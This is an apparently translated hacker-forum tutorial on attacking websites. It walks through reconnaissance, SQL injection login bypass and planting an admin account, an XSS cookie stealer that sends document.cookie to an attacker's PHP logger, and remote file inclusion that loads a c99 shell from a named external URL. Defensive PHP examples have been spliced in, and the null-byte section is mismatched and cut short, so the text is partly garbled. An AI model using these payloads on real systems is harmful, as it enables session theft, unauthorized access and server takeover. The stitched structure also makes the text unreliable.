
Techniques for attacking a website.

I will divide this article into the following parts:


QUOTE
1> Learning about the attack target.
2> a. SQL Injection - Login Bypass
b. SQL Injection - Getting table information
3> a. XSS - Cookie Stealer (stealing cookies)
b. JavaScript Injection
4> Remote File Inclusion
5> a. Null Byte - Picture Upload
b. Null Byte - CGI Exploitation
6> Summary.
1> Learning about the attack target:
This is a very important first step that cannot be skipped when you want to attack a website. We need to use specialized tools to scan for information about the website, for example finding open ports and looking at information about the host.
First, find the open ports of the web host. You can use programs such as Super Scanner from Foundstone (an easy program to use), or the NMAP scanner, which most people consider the better scanner.
For each open port you find, see what kind of service it belongs to; from that we can learn about the directory configuration on the web host.
Gather other information as well, for example the registrar of the domain, using whois websites such as:
CODE
http://whois.networksolutions.com/
CODE
http://www.dnsstuff.com/
You will obtain valuable information about the target website.
2> a. SQL Injection - Login Bypass:
The most basic and simplest form of SQL Injection is the login bypass. On a website with an SQL Injection flaw we can use the following string:
CODE
OR 1=1-
Enter it in the username and password fields of the login page, and we can "get past" the SQL query and obtain "privileges" on the vulnerable website.
You can also put it into the URL of the vulnerable website. For example, suppose the site with the SQL Injection flaw is target.com:
CODE
www.target.com/index.php?id=0
We inject SQL as follows:
CODE
www.target.com/index.php?id=0 OR 1=1-
We get the same result as in the previous step. Here are a few injections that can be used:

CODE
admin'-
' or 0=0 -
" or 0=0 -
or 0=0 -
hi or 1=1-
This is the simplest step of the SQL Injection technique; however, sometimes it gives no clear result on a particular vulnerable website.
CODE
http://www.sqlsecurity.com/ - General information about SQL security/injection
http://w3schools.com/sql/default.asp - Learn and study the SQL language
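Why the login bypass works, and the fix, as an added example that is not part of the original article: the login query built by string concatenation next to the same check with a bound parameter. The table, credentials and probe string are constructed, and the script assumes PHP 7.4+ with the pdo_sqlite extension.

```php
<?php
// Added example: constructed users table in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (name TEXT, pass_hash TEXT)");
$ins = $db->prepare("INSERT INTO users VALUES (?, ?)");
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Vulnerable 'before': user input becomes part of the SQL text, so a quote
// ends the string literal and the rest of the input is parsed as SQL.
function login_vulnerable(PDO $db, string $user, string $pass): bool {
    $sql = "SELECT name FROM users WHERE name = '$user' AND pass_hash = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: the username is bound as data and never parsed as SQL; the
// password is checked in PHP against a stored hash, not inside the query.
function login_safe(PDO $db, string $user, string $pass): bool {
    $st = $db->prepare("SELECT pass_hash FROM users WHERE name = ?");
    $st->execute([$user]);
    $hash = $st->fetchColumn();
    return $hash !== false && password_verify($pass, $hash);
}

// Constructed probe in the usual form of the string this section describes:
// the tautology makes the WHERE clause true for every row, and the trailing
// comment marker discards the rest of the original query.
$probe = "' OR 1=1--";

var_dump(login_vulnerable($db, $probe, $probe));    // tautology input, concatenated query
var_dump(login_safe($db, $probe, $probe));          // same input, bound parameter
var_dump(login_safe($db, 'admin', 'correct horse')); // legitimate login
```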
2> b. SQL Injection - Getting table information:
This is a more advanced technique for exploiting SQL Injection. It has 3 steps: first we cause an error on the site with the SQL Injection flaw in order to find table names (with the aim of creating a privileged account). Next we cause another error to obtain an important table name. Finally we inject SQL to create an admin account.
To get the final result, first log in on the vulnerable site with the following username:
CODE
Having1=1-
Leave the password empty and press Enter. We receive an error message containing a table name, similar to this:
SQL
Column user_member.user_id is invalid and was not found ....
(note that the part in purple is an example of a table name). The error message may be longer, but the important thing we need is the table name; in the example above it is user_member.id, which holds the username information. The next step is to find other important table names:
SQL
UNION SELECT * FROM user_member WHERE USER_ID=admin GROUP BY
USER_ID HAVING 1=1;-
The error received may look like this:
QUOTE
Column user_member.user_id is invalid and was not found Column
user_member.passwd is invalid and was not found
and the new table obtained here is user_member.passwd, the table that holds the password. With the tables we have found, we create an account with admin privileges:
SQL
INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,
CREATION_DATE) VALUES(VietLuv,hacked,hacked,GETDATE();-
Now we can log in with admin rights using the username VietLuv and the password hacked.
The above is only the most basic SQL Injection exploitation; hackers use SQL Injection to find tables containing important information such as credit cards, and so on. More study and more patience are needed to get the desired result. If you have questions, you can post them here.
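A detection sketch for the probes described in sections 2a and 2b, as an added example that is not part of the original article: it URL-decodes the query string of each access-log request line and flags numeric tautologies, HAVING 1=1, UNION SELECT and a trailing SQL comment. The log lines are constructed; only query strings are inspected, so probes sent in a POST body need the same patterns applied at the application or WAF layer.

```php
<?php
// Added example: patterns for the SQL injection probes from sections 2a/2b.
const SQLI_PATTERNS = [
    'numeric tautology' => '/\bor\s+(\d+)\s*=\s*\1\b/i',      // OR 1=1, or 0=0
    'having 1=1'        => '/\bhaving\s*1\s*=\s*1/i',
    'union select'      => '/\bunion\s+(all\s+)?select\b/i',
    'trailing comment'  => '/--\s*$/',
];

// Returns the names of the patterns that match the request's query string.
function sqli_findings(string $logLine): array {
    // Combined log format: the request line is the first quoted field.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];                       // no query string, or unparsable URL
    }
    $decoded = urldecode($query);        // %20 and + become spaces
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log lines (documentation IP range, hypothetical paths).
$lines = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=0%20OR%201=1-- HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:04 +0000] "GET /login.php?user=having%201=1-- HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=1+UNION+SELECT+1 HTTP/1.1" 500 0',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 900',
];
foreach ($lines as $line) {
    $hits = sqli_findings($line);
    printf("%s => %s\n", strtok($line, ' '), $hits ? implode(', ', $hits) : 'clean');
}
```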
3> a. XSS - Cookie Stealer (stealing cookies):
In this part we will talk about XSS (or CSS) >> Cross Site Scripting: how to place code that takes cookies on guestbooks or poorly secured forums and saves them after users log in. Cookies are used by most forums to confirm the user's identity, and there is only one cookie per user, so once we have the cookie of some user we can begin to act as that user.
First we use PHP to create the script that steals the cookie:
CODE
/*VNMagicCookieStealer*/
/*Putthisupinyourhosting*/
$cookie=$_GET['cookie'];
$log=fopen("cookiesVNM.txt\",\"a\");
fwrite($log,$cookie.\"n\");
fclose($log);
?>
Copy the code above and save it as stealer.php.
The content of the code is as follows:
HTML
$cookie = $_GET['cookie'];
and do not forget one very important line:
HTML
$log = fopen("cookiesVNM.txt","a");
Create an empty text file named cookiesVNM.txt.
Upload the two files mentioned above to your host and do not forget to chmod the file cookiesVNM.txt to 666 >> With that you basically have the cookie-stealing script.
On a site with an XSS Injection flaw, you can test by posting the following code in the parts of the site that accept input:
HTML
<script>alert(Testing For XSS Hole)</script>
If you get an alert box that says Testing For XSS Hole, then the site is definitely vulnerable.
We can then steal the cookie by using the following code:
HTML
<script>
window.location = 'http://yoursite.com/stealer.php?cookie' + document.cookie;
</script>
This code redirects the member to the stealer.php page you created and saves the cookie in the file cookiesVNM.txt.
You can learn more about XSS in the article Hacking Guestbooks by GirL_Noob.
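The two controls that break the cookie theft described in this section, as an added example that is not part of the original article: encoding user-supplied text on output so a posted script tag is displayed as text, and marking the session cookie HttpOnly so page script cannot read it through document.cookie. The function name and markup are hypothetical; PHP 7.4+ is assumed.

```php
<?php
// Added example. Cookie parameters must be set before any output is sent
// and before session_start() is called.
session_set_cookie_params([
    'httponly' => true,    // cookie is not exposed to document.cookie
    'secure'   => true,    // cookie is only sent over HTTPS
    'samesite' => 'Lax',   // cookie is not attached to cross-site subrequests
]);

// Encode every user-supplied value at the point where it is written into
// HTML. The browser then renders <, >, & and quotes as characters instead
// of interpreting them as markup.
function render_entry(string $author, string $message): string {
    $e = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="entry"><b>' . $e($author) . '</b>: '
         . $e($message) . '</div>';
}

// Constructed guestbook post: the test string from this section.
$posted = "<script>alert('Testing For XSS Hole')</script>";

// The stored text is unchanged; only its HTML representation is encoded,
// so the entry is shown literally and no script element is created.
echo render_entry('guest', $posted), "\n";

// The effective cookie settings, for checking a deployment.
print_r(session_get_cookie_params());
```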
4> Remote File Inclusion:
Remote File Inclusion (RFI for short) is a flaw found on quite a lot of websites today. It is extremely simple to exploit, so in general it is quite common at the present time.
Exploiting Remote File Inclusion can be understood like this: when we place a file of ours (for example a file uploader or a PHP shell) on a web page, the web server of that page interprets and displays it according to our PHP script, and we can then easily gain full control of the server.
More precisely, when a website displays another page of its own, we edit the URL and put the address of our PHP shell code in it; the site "mistakes" it for the page it is supposed to display, and so we have the PHP shell page right on the website's server.
People can find vulnerable pages in their own way; within the scope of this article I will describe using Google to search for vulnerable sites. We can search like this:
CODE
inurl:"index.php?page="
Google will then return pages that have "index.php?page=" in the URL, and a simple way to test whether a site is vulnerable is to add www.google.com after the = sign in the site's link:
CODE
www.site.com/index.php?page=www.google.com
If the whole Google page is displayed inside the site, then the site is definitely vulnerable. To exploit this flaw we use a text file containing PHP shell code uploaded to our own host, and make the vulnerable site display it by changing the URL to add the link to where our shell file is stored.
Call the vulnerable site victim, your PHP shell shell.txt and the site hosting it yoursite; we then have:
CODE
http://victim/index.php?page=http://yoursite/shell.txt
Very simple, isn't it? As a PHP shell, VietLuv suggests remview:
CODE
http://php.spb.ru/remview/remview_2003_10_23.zip
Otherwise, just use the c99 shell already uploaded by VN Magic at:
CODE
http://matrix2k.org/testsh.txt
That is, use VN Magic's PHP shell directly so you do not have to go looking for one; just add the link above after the = sign of the vulnerable page and you can control the web server.
PS: If you want to practice right away, go to the article "Practicing an attack on an easy website" by Quỳnh Anh. Have fun.
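The fix for the index.php?page= pattern described in this section, as an added example that is not part of the original article: the request parameter selects a key from a fixed allowlist and is never used as a path or URL itself. The page names and file paths are hypothetical. Separately, the php.ini directive allow_url_include should stay Off (its default), which stops include from fetching URLs at all.

```php
<?php
// Added example; page keys and file paths below are hypothetical.

// Vulnerable 'before' (shown as a comment only): the parameter is passed
// straight to include, so any path or URL the client sends is loaded.
//   include $_GET['page'];

// Hardened: the only files that can ever be included are listed here.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

// Maps the raw request value to a file from PAGES. Anything that is not an
// exact key (a URL, a host name, an array, a path) falls back to 'home'
// and is logged for review.
function resolve_page($requested): string {
    if ($requested === null) {
        return __DIR__ . '/' . PAGES['home'];
    }
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        $shown = is_string($requested)
            ? rawurlencode(substr($requested, 0, 200))
            : gettype($requested);
        error_log('rejected page parameter: ' . $shown);
        return __DIR__ . '/' . PAGES['home'];
    }
    return __DIR__ . '/' . PAGES[$requested];
}

// The values this section uses as tests, next to legitimate ones.
$samples = [null, 'contact', 'www.google.com', 'http://yoursite/shell.txt'];
foreach ($samples as $p) {
    printf("%-30s -> %s\n", var_export($p, true), resolve_page($p));
}

// In index.php the call site becomes:
//   include resolve_page($_GET['page'] ?? null);
```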
5> a. Null Byte - Picture Upload:
Specialized port scanning tools:
Super Scanner 4.0
CODE
http://www.foundstone.com/index.htm?subnav=resources%2Fnavigation.htm&subcontent=%2Fresources%2Fproddesc%2Fsuperscan4.htm
This program works very well on Windows.
Nmap-4.21ALPHA4
CODE
http://insecure.org/
NMap is always considered the best scanning tool.
Besides these there are other scanning tools such as Nessus (vulnscanner):
CODE
http://www.nessus.org/
